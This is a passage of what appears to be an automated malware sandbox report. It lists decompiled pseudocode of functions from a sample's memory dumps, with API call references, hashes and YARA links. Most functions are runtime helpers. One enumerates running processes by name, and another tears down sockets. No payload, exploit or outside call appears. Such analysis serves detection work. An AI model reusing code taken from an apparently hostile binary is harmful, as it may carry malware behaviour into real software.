				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E0042E296(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E0042E2C1();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E004262AC();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x00426256
0x00426258
0x0042625d
0x00426262
0x00426267
0x004262de
0x004262e3
0x004262e3
0x00426270
0x004262b5
0x004262b6
0x004262be
0x004262c4
0x004262c6
0x004262c8
0x004262db
0x004262dd
0x00000000
0x004262c6
0x00426274
0x0042627a
0x0042627f
0x00426285
0x0042628a
0x0042628c
0x0042628d
0x0042628e
0x00426294
0x00426295
0x0042629c
0x004262a5
0x00000000
0x004262a7
0x004262a7
0x00000000
0x004262a7

APIs

__lock.LIBCMT ref: 00426274

Part of subcall function 0042E21D: __mtinitlocknum.LIBCMT ref: 0042E231
Part of subcall function 0042E21D: __amsg_exit.LIBCMT ref: 0042E23D
Part of subcall function 0042E21D: EnterCriticalSection.KERNEL32(?,?,8E7DE579,00426365,00000004,0044A750,0000000C,0042AD44,?,?,00000000,00000000,00000000,0042A9E6,00000001,00000214), ref: 0042E245

___sbh_find_block.LIBCMT ref: 0042627F
___sbh_free_block.LIBCMT ref: 0042628E
HeapFree.KERNEL32(00000000,8E7DE579,0044A730,0000000C,0042E1FE,00000000,0044A960,0000000C,0042E236,8E7DE579,?,8E7DE579,00426365,00000004,0044A750,0000000C), ref: 004262BE
GetLastError.KERNEL32(?,0040A3E6,00000000,?,00000000,00415543,0000000C,00000004,00401D16,?,0040568B,80070057,8E7DE579,00417183,?,00000004), ref: 004262CF

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 3948863bd53c8b88d966da880a07cbb8d549c2d93849d7a8301891c3ffeb7867
Instruction ID: 74c3092c49223f76293522e6c00b200ffab506f4b9639e08bb125e0f5482b7d0
Opcode Fuzzy Hash: 3948863bd53c8b88d966da880a07cbb8d549c2d93849d7a8301891c3ffeb7867
Instruction Fuzzy Hash: D9018431B01331E6EB207B72BD0AB5E3B689F01725FA1009FF400AA1D1DA7C89408ABC

Uniqueness

Uniqueness Score: -1.00%

Function 10004A35, Relevance: 7.5, APIs: 5, Instructions: 39
processstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004A35(char* _a4) {
				char _v264;
				void* _v300;
				int _t9;
				void* _t13;
				void* _t17;

				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 == 0xffffffff) {
					L7:
					return 0;
				}
				_v300 = 0x128;
				_t9 = Process32First(_t17,  &_v300);
				while(_t9 != 0) {
					if(strcmp(_a4,  &_v264) == 0) {
						_t13 = 1;
						return _t13;
					}
					_t9 = Process32Next(_t17,  &_v300);
				}
				CloseHandle(_t17);
				goto L7;
			}

0x10004a48
0x10004a4d
0x10004a9a
0x00000000
0x10004a9a
0x10004a55
0x10004a61
0x10004a66
0x10004a7d
0x10004a90
0x00000000
0x10004a90
0x10004a87
0x10004a87
0x10004a94
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004A43
Process32First.KERNEL32(00000000,?), ref: 10004A61
strcmp.MSVCRT ref: 10004A74
Process32Next.KERNEL32 ref: 10004A87
CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 10004A94

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32strcmp
String ID:
API String ID: 4096969662-0
Opcode ID: d88723f23b7a4035b5de7b1f2b0609e940d3bd6cd750d6377d39233ae4597d38
Instruction ID: d1c6035be11c0775762cbb0725d9a22761f87c68cec72db4826b1fd6b1e44bb6
Opcode Fuzzy Hash: d88723f23b7a4035b5de7b1f2b0609e940d3bd6cd750d6377d39233ae4597d38
Instruction Fuzzy Hash: 16F02475685124EAF720E6609C42BDA36ECCF093A1F110062FC14ED0C0EF70EEC1459A

Uniqueness

Uniqueness Score: -1.00%

Function 100016A7, Relevance: 7.5, APIs: 5, Instructions: 38
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100016A7(intOrPtr __ecx) {
				void* _t29;
				intOrPtr _t39;
				void* _t41;

				E100158AC(E1001A0DE, _t41);
				_push(__ecx);
				_t39 = __ecx;
				 *((intOrPtr*)(_t41 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1001b3e8;
				 *(__ecx + 0x53) =  *(__ecx + 0x53) & 0x00000000;
				 *(_t41 - 4) = 3;
				WaitForSingleObject( *(__ecx + 0x44), 0xffffffff);
				if( *((intOrPtr*)(_t39 + 0x48)) != 0xffffffff) {
					E10001B2C(_t39);
				}
				CloseHandle( *(_t39 + 0x44));
				CloseHandle( *(_t39 + 0x4c));
				 *0x10027388();
				 *(_t41 - 4) = 2;
				E10001014(_t39 + 0x34);
				 *(_t41 - 4) = 1;
				E10001014(_t39 + 0x24);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				E10001014(_t39 + 0x14);
				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
				_t29 = E10001014(_t39 + 4);
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t29;
			}

0x100016ac
0x100016b1
0x100016b3
0x100016b5
0x100016b8
0x100016be
0x100016c7
0x100016ce
0x100016d8
0x100016dc
0x100016dc
0x100016e4
0x100016ed
0x100016f3
0x100016fc
0x10001700
0x10001708
0x1000170c
0x10001711
0x10001718
0x1000171d
0x10001724
0x1000172d
0x10001735

APIs

__EH_prolog.LIBCMT ref: 100016AC
WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,1000BE52,?), ref: 100016CE
CloseHandle.KERNEL32(?,?,1000BE52,?), ref: 100016E4
CloseHandle.KERNEL32(?,?,1000BE52,?), ref: 100016ED
WSACleanup.WS2_32 ref: 100016F3

Part of subcall function 10001B2C: setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 10001B51
Part of subcall function 10001B2C: CancelIo.KERNEL32(000000FF,?,?,?,100016E1,?,1000BE52), ref: 10001B5A
Part of subcall function 10001B2C: InterlockedExchange.KERNEL32(00000000,00000000), ref: 10001B66
Part of subcall function 10001B2C: closesocket.WS2_32(000000FF), ref: 10001B6F
Part of subcall function 10001B2C: SetEvent.KERNEL32(?,?,?,?,100016E1,?,1000BE52), ref: 10001B78

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
String ID:
API String ID: 1476891362-0
Opcode ID: a3e391f86fb2d295178dbee69a5f843b6cbdfe050763bcd1df5ab91825a884dc
Instruction ID: bebfa013194c2426fd0ed45b432880476456e0c4353b1314dafa7b4e5aad91c0
Opcode Fuzzy Hash: a3e391f86fb2d295178dbee69a5f843b6cbdfe050763bcd1df5ab91825a884dc
Instruction Fuzzy Hash: F30169344006A0EFEB25DBA4C9496DDBBF0FF04714F20064CE0A6925E1CBB5AA49EB21

Uniqueness

Uniqueness Score: -1.00%

Function 004209A7, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004209A7(void* __ebp, signed int _a4) {
				struct _CRITICAL_SECTION* _t4;
				void* _t10;
				signed int _t11;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t11 = _a4;
				if(_t11 >= 0x11) {
					_t4 = E00415838(_t10);
				}
				if( *0x452838 == 0) {
					_t4 = E00420983();
				}
				_push(_t17);
				_t15 = 0x4529f0 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x4529d8);
					if( *_t15 == 0) {
						_t4 = 0x452840 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x4529d8);
				}
				EnterCriticalSection(0x452840 + _t11 * 0x18);
				return _t4;
			}

0x004209a7
0x004209a8
0x004209af
0x004209b1
0x004209b1
0x004209bd
0x004209bf
0x004209bf
0x004209cb
0x004209cd
0x004209dc
0x004209e3
0x004209e8
0x004209ef
0x004209f2
0x004209f8
0x004209f8
0x004209ff
0x004209ff
0x00420a0b
0x00420a11

APIs

EnterCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004209E3
InitializeCriticalSection.KERNEL32(8E7DE579,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004209F2
LeaveCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004209FF
EnterCriticalSection.KERNEL32(8E7DE579,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00420A0B

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

Strings

@(E, xrefs: 004209D7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID: @(E
API String ID: 3253506028-3559935847
Opcode ID: 76c733bfa3f9be638516b75e0970b0057b3ff9808dbc08cc3a6b71f2b021d23e
Instruction ID: 0b45ed2ce7d1d7c0d3b73bbd124780f87e8a73dcbb789e9f84b6d13e0c2184a1
Opcode Fuzzy Hash: 76c733bfa3f9be638516b75e0970b0057b3ff9808dbc08cc3a6b71f2b021d23e
Instruction Fuzzy Hash: A6F0F6F3B002149FEA106B58FD8471AB699FB92326F91122BF04142257D7B884C1CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2C, Relevance: 7.5, APIs: 5, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E10001B2C(void* __ecx) {
				signed short _v6;
				short _v8;
				int _t18;
				void* _t20;
				void* _t21;

				_v6 = _v6 & 0x00000000;
				_t21 = __ecx;
				_v8 = 1;
				 *0x100273a8( *(__ecx + 0x48), 0xffff, 0x80,  &_v8, 4, _t20, __ecx);
				CancelIo( *(__ecx + 0x48));
				InterlockedExchange(_t21 + 0x53, 0);
				 *0x100273a4( *(_t21 + 0x48));
				_t18 = SetEvent( *(_t21 + 0x4c));
				 *(_t21 + 0x48) =  *(_t21 + 0x48) | 0xffffffff;
				return _t18;
			}

0x10001b31
0x10001b3c
0x10001b4b
0x10001b51
0x10001b5a
0x10001b66
0x10001b6f
0x10001b78
0x10001b7e
0x10001b84

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 10001B51
CancelIo.KERNEL32(000000FF,?,?,?,100016E1,?,1000BE52), ref: 10001B5A
InterlockedExchange.KERNEL32(00000000,00000000), ref: 10001B66
closesocket.WS2_32(000000FF), ref: 10001B6F
SetEvent.KERNEL32(?,?,?,?,100016E1,?,1000BE52), ref: 10001B78

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 45498e16606329ae352bb2331dd30065682f2f6f488811f90fcf57469e3c23f8
Instruction ID: 2aecaa1700f45e1325c8eaf00d396d1305c143876080360cf3fa55cd9c336fda
Opcode Fuzzy Hash: 45498e16606329ae352bb2331dd30065682f2f6f488811f90fcf57469e3c23f8
Instruction Fuzzy Hash: 94F05E31000725FFEB219B95CC4AA8A7BB8FF04324F204568F782915F0DBB2A945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00422E21, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00422E21(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t99;
				signed short _t101;
				signed int _t107;
				signed int _t111;
				void* _t112;
				signed short _t119;
				signed int _t123;
				signed int _t125;
				signed short* _t126;
				intOrPtr* _t128;
				signed int _t141;
				void* _t142;
				signed int _t147;
				signed int* _t148;
				signed short* _t150;
				signed int _t151;
				signed short _t152;
				void* _t153;

				_push(0x18);
				E004271DA(E0043B3DB, __ebx, __edi, __esi);
				_t147 =  *(_t153 + 8);
				_t142 = 4;
				 *_t147 = __ecx;
				_t148 = _t147 + _t142;
				if( *(_t153 + 0x14) == 6 ||  *(_t153 + 0x14) == 0xc) {
					 *_t148 =  *(_t153 + 0x10);
					_t148 = _t148 + _t142;
				}
				_t128 =  *((intOrPtr*)(_t153 + 0x18));
				 *(_t153 - 0x14) =  *(_t153 - 0x14) & 0x00000000;
				 *((intOrPtr*)(_t153 - 0x18)) =  *_t128;
				 *(_t153 + 8) =  *(_t128 + 8);
				 *(_t153 - 0x10) =  *(_t128 + 0xc);
				_t99 =  *(_t153 + 0xc);
				 *(_t153 + 0x10) = _t99;
				if( *_t99 == 0) {
					L55:
					if( *(_t153 + 8) <= 0) {
						__eflags =  *( *(_t153 + 0x10));
						if( *( *(_t153 + 0x10)) == 0) {
							_t101 = 0;
							__eflags = 0;
						} else {
							 *( *(_t153 + 0x1c)) =  *(_t128 + 8);
							_t101 = 0x8002000f;
						}
						goto L61;
					}
					_t101 = 0x8002000e;
					goto L57;
				} else {
					do {
						_t101 =  *( *(_t153 + 0x10)) & 0xff;
						_t123 =  *(_t153 + 8) - 1;
						 *(_t153 + 8) = _t123;
						 *(_t153 + 0x14) = _t101;
						if(_t101 != 0xff && (_t101 & 0x00000040) != 0) {
							_t101 = _t101 & 0xffffffbf | 0x00004000;
							 *(_t153 + 0x14) = _t101;
						}
						if(_t123 <  *(_t153 - 0x10)) {
							__eflags = _t101 - 0xff;
							if(__eflags != 0) {
								__eflags =  *(_t153 - 0x14);
								if( *(_t153 - 0x14) != 0) {
									break;
								}
								__eflags = _t101 - 0xc;
								if(__eflags != 0) {
									break;
								}
								 *0x452a58 = 0xa;
								 *0x452a60 = 0x80020004;
								_t150 = 0x452a58;
								goto L28;
							}
							 *(_t153 - 0x10) =  *(_t153 - 0x10) & 0x00000000;
							 *(_t153 + 8) =  *( *((intOrPtr*)(_t153 + 0x18)) + 0xc);
							 *(_t153 - 0x14) = 1;
						} else {
							if(_t101 == 0xff) {
								break;
							}
							_t125 = _t123 << 4;
							_t150 = _t125 +  *((intOrPtr*)(_t153 - 0x18));
							if(_t101 == 0xc) {
								L28:
								if((_t101 & 0x00004000) == 0) {
									_t107 = (_t101 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t107 - 0x13;
									if(__eflags > 0) {
										goto L53;
									}
									switch( *((intOrPtr*)(_t107 * 4 +  &M004230B9))) {
										case 0:
											_t72 = __esi + 8; // 0x0
											__eax =  *_t72;
											goto L51;
										case 1:
											_t82 = __esi + 8; // 0x0
											__eax =  *_t82;
											goto L51;
										case 2:
											 *__edi =  *(__esi + 8);
											goto L52;
										case 3:
											 *__edi =  *(__esi + 8);
											goto L46;
										case 4:
											_t74 = __esi + 8; // 0x0
											__eax =  *_t74;
											 *__edi =  *_t74;
											_t75 = __esi + 0xc; // 0x0
											__eax =  *_t75;
											__edi[1] = __eax;
											L46:
											__edi =  &(__edi[2]);
											goto L53;
										case 5:
											__eax = 0;
											__eflags =  *(__esi + 8) - __ax;
											__eax = 0 | __eflags != 0x00000000;
											goto L51;
										case 6:
											L38:
											 *_t148 = _t151;
											goto L52;
										case 7:
											goto L53;
										case 8:
											_t70 =  &(_t150[4]); // 0x0
											_t109 =  *_t70;
											goto L51;
										case 9:
											_t71 = __esi + 8; // 0x0
											__eax =  *_t71 & 0x000000ff;
											goto L51;
										case 0xa:
											_t73 = __esi + 8; // 0x0
											__eax =  *_t73 & 0x0000ffff;
											L51:
											 *_t148 = _t109;
											L52:
											_t148 = _t148 + _t142;
											goto L53;
									}
								}
								if(_t101 != 0x400b) {
									L37:
									_t67 =  &(_t150[4]); // 0x0
									_t151 =  *_t67;
									goto L38;
								}
								_t124 =  *((intOrPtr*)(_t153 + 0x24));
								if( *((intOrPtr*)(_t153 + 0x24)) == 0) {
									goto L37;
								}
								_t48 =  &(_t150[4]); // 0x0
								 *(_t153 + 0x14) = 0 |  *( *_t48) != 0x00000000;
								_t111 = E0040A3C7( *( *_t48), _t142);
								if(_t111 == 0) {
									_t54 = _t153 + 0x14;
									 *_t54 =  *(_t153 + 0x14) & 0x00000000;
									__eflags =  *_t54;
								} else {
									 *_t111 =  *(_t153 + 0x14);
									 *(_t153 + 0x14) = _t111;
								}
								_t56 =  &(_t150[4]); // 0x0
								_t112 = E00422981(_t153 - 0x24, _t150,  *(_t153 + 0x14),  *_t56, 1);
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								E00422DA3(_t124, _t142, _t153,  *((intOrPtr*)(_t124 + 8)), _t112);
								 *(_t153 - 4) =  *(_t153 - 4) | 0xffffffff;
								_t176 =  *((intOrPtr*)(_t153 - 0x1c));
								if( *((intOrPtr*)(_t153 - 0x1c)) != 0) {
									_push( *((intOrPtr*)(_t153 - 0x24)));
									E0040A3F2(_t124, _t142, _t148, _t150, _t176);
								}
								_t151 =  *(_t153 + 0x14);
								_t142 = 4;
								goto L38;
							}
							_t141 =  *_t150 & 0x0000ffff;
							if(_t101 == _t141) {
								goto L28;
							}
							_t126 = _t125 +  *((intOrPtr*)(_t153 + 0x20));
							if(_t101 != 0xe) {
								 *(_t153 + 0xc) = _t101 & 0x0000ffff;
							} else {
								 *(_t153 + 0xc) = 8;
							}
							if(_t141 ==  *(_t153 + 0xc)) {
								L17:
								_t142 = 4;
								if(_t101 == 0xe) {
									if( *_t150 ==  *(_t153 + 0xc)) {
										_t126[4] = E0042284E(_t150[4]);
										 *_t126 = 8;
									} else {
										_t152 = _t126[4];
										_t119 = E0042284E(_t152);
										_t126[4] = _t119;
										__imp__#6(_t152);
									}
									 *(_t153 + 0x14) = 8;
									_t101 =  *(_t153 + 0x14);
									_t142 = 4;
								}
								_t150 = _t126;
								goto L28;
							} else {
								__imp__#12(_t126, _t150, 0,  *(_t153 + 0xc));
								if(_t101 < 0) {
									L57:
									 *( *(_t153 + 0x1c)) =  *(_t153 + 8);
									L61:
									return E004272B2(_t101);
								}
								_t101 =  *(_t153 + 0x14);
								goto L17;
							}
						}
						L53:
						 *(_t153 + 0x10) =  &(( *(_t153 + 0x10))[1]);
					} while ( *( *(_t153 + 0x10)) != 0);
					_t128 =  *((intOrPtr*)(_t153 + 0x18));
					goto L55;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 00422E28
VariantChangeType.OLEAUT32(?,?,00000000,0000000C), ref: 00422EF8
SysFreeString.OLEAUT32(?), ref: 00422F28

Strings

X*E, xrefs: 00422F96

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeFreeH_prolog3StringTypeVariant
String ID: X*E
API String ID: 580759134-4097040173
Opcode ID: 5870e150e12d191b692ebd522894b2d07e62044ab5d0bf5f70a0bf4d1ffb5213
Instruction ID: 7d5537c4e89ee5a54534abc9f7542034b9e02394bca3fa197badf67db7e7968e
Opcode Fuzzy Hash: 5870e150e12d191b692ebd522894b2d07e62044ab5d0bf5f70a0bf4d1ffb5213
Instruction Fuzzy Hash: D6819070600226DFDB20DF14E5407AA77B0FF04311F94805AE895AB395C3BDDE92DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404BE0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404BE0(intOrPtr __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr _t55;
				signed int _t60;
				unsigned int _t66;
				intOrPtr* _t68;
				unsigned int _t72;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t87;
				signed int _t91;
				signed int _t96;
				intOrPtr _t97;
				void* _t98;

				_t94 = _t96;
				_push(0xffffffff);
				_push(E0043B840);
				_push( *[fs:0x0]);
				_t97 = _t96 - 0x1c;
				_t45 =  *0x44f5d0; // 0x8e7de579
				_push(_t45 ^ _t96);
				 *[fs:0x0] =  &_v16;
				_v20 = _t97;
				_t87 = __ecx;
				_v24 = __ecx;
				_t48 = _a4;
				_t91 = _t48 | 0x0000000f;
				if(_t91 <= 0xfffffffe) {
					_t66 =  *(__ecx + 0x18);
					_t48 = 0xaaaaaaab * _t91;
					_t72 = _t66 >> 1;
					_t83 = 0xaaaaaaab * _t91 >> 0x20 >> 1;
					__eflags = 0xaaaaaaab * _t91 >> 0x20 >> 1 - _t72;
					if(__eflags < 0) {
						_t48 = 0xfffffffe - _t72;
						__eflags = _t66 - 0xfffffffe;
						if(__eflags <= 0) {
							_t91 = _t72 + _t66;
						}
					}
				} else {
					_t91 = _t48;
				}
				_t73 = _t91 + 1;
				_v8 = 0;
				if(_t73 > 0) {
					_t50 = _t48 | 0xffffffff;
					_t83 = _t50 % _t73;
					__eflags = _t50 / _t73 - 1;
					if(__eflags >= 0) {
						goto L7;
					} else {
						_v28 = 0;
						E00425E86( &_v44, _t83,  &_v28);
						_v44 = 0x44257c;
						E00429326( &_v44, 0x44ae50);
						_t60 = _a4;
						_a4 = _t60;
						_t61 = _t60 + 1;
						__eflags = _t60 + 1;
						_v20 = _t97;
						_v8 = 2;
						_v32 = E00404E80(0, _t91, _t94, _t61);
						_v8 = 1;
						return E00404CBE;
					}
				} else {
					_t73 = 0;
					L7:
					_t52 = E0040A3C7(0, _t73);
					_t98 = _t97 + 4;
					_t68 = _t52;
					_v8 = 0xffffffff;
					_t74 = _a8;
					if(_t74 > 0) {
						if( *(_t87 + 0x18) < 0x10) {
							_t55 = _t87 + 4;
						} else {
							_t55 =  *((intOrPtr*)(_t87 + 4));
						}
						E00425DFA(_t68, _t74, _t68, _t91 + 1, _t55, _t74);
						_t74 = _a8;
						_t98 = _t98 + 0x10;
					}
					_t106 =  *(_t87 + 0x18) - 0x10;
					if( *(_t87 + 0x18) >= 0x10) {
						_push( *((intOrPtr*)(_t87 + 4)));
						E0040A3F2(_t68, _t83, _t87, _t91, _t106);
						_t74 = _a8;
					}
					_t53 = _t87 + 4;
					 *_t53 = 0;
					 *_t53 = _t68;
					 *(_t87 + 0x18) = _t91;
					 *((intOrPtr*)(_t87 + 0x14)) = _t74;
					if(_t91 >= 0x10) {
						_t53 = _t68;
					}
					 *((char*)(_t53 + _t74)) = 0;
					 *[fs:0x0] = _v16;
					return _t53;
				}
			}

APIs

std::exception::exception.LIBCMT ref: 00404C7B
__CxxThrowException@8.LIBCMT ref: 00404C90
_memcpy_s.LIBCMT ref: 00404CE3

Strings

|%D, xrefs: 00404C89

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_memcpy_sstd::exception::exception
String ID: |%D
API String ID: 464988439-1005067592
Opcode ID: 32ff52e2e4a70db2d702f88111ec306cc7296b46f110a39879fcea45eb6979fd
Instruction ID: 60c8eee6bf82f68e9cb2171cbe7560a0f9cea5bb4dcc51287f9e85b9e92e644a
Opcode Fuzzy Hash: 32ff52e2e4a70db2d702f88111ec306cc7296b46f110a39879fcea45eb6979fd
Instruction Fuzzy Hash: 3A4106B1A04605AFDB04DF69C98069EB7B4FB84310F10423FE926A73C0D775AA40CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00404550, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404550(intOrPtr _a4, signed int _a8, signed int _a12) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				signed int _t51;
				signed int _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t60;
				unsigned int _t69;
				intOrPtr* _t71;
				unsigned int _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t88;
				signed int _t92;
				signed int _t97;
				intOrPtr _t98;
				void* _t99;

				_t95 = _t97;
				_push(0xffffffff);
				_push(E0043B8C0);
				_push( *[fs:0x0]);
				_t98 = _t97 - 0x18;
				_t48 =  *0x44f5d0; // 0x8e7de579
				_push(_t48 ^ _t97);
				 *[fs:0x0] =  &_v16;
				_v20 = _t98;
				_t51 = _a8;
				_t88 = _a4;
				_t92 = _t51 | 0x00000007;
				if(_t92 <= 0x7ffffffe) {
					_t69 =  *(_t88 + 0x18);
					_t51 = 0xaaaaaaab * _t92;
					_t74 = _t69 >> 1;
					_t84 = 0xaaaaaaab * _t92 >> 0x20 >> 1;
					__eflags = 0xaaaaaaab * _t92 >> 0x20 >> 1 - _t74;
					if(__eflags < 0) {
						_t51 = 0x7ffffffe - _t74;
						__eflags = _t69 - 0x7ffffffe;
						if(__eflags <= 0) {
							_t92 = _t74 + _t69;
						}
					}
				} else {
					_t92 = _t51;
				}
				_t75 = _t92 + 1;
				_v8 = 0;
				if(_t75 > 0) {
					_t53 = _t51 | 0xffffffff;
					_t84 = _t53 % _t75;
					__eflags = _t53 / _t75 - 2;
					if(__eflags >= 0) {
						goto L7;
					} else {
						_v24 = 0;
						E00425E86( &_v40, _t84,  &_v24);
						_v40 = 0x44257c;
						E00429326( &_v40, 0x44ae50);
						_t64 = _a8;
						_v20 = _t98;
						_v8 = 2;
						_v28 = L00404E20(0, _t64 + 1, _t92, _t95);
						_v8 = 1;
						return E0040462E;
					}
				} else {
					_t75 = 0;
					L7:
					_t56 = E0040A3C7(0, _t75 + _t75);
					_t99 = _t98 + 4;
					_t71 = _t56;
					_v8 = 0xffffffff;
					_t76 = _a12;
					if(_t76 > 0) {
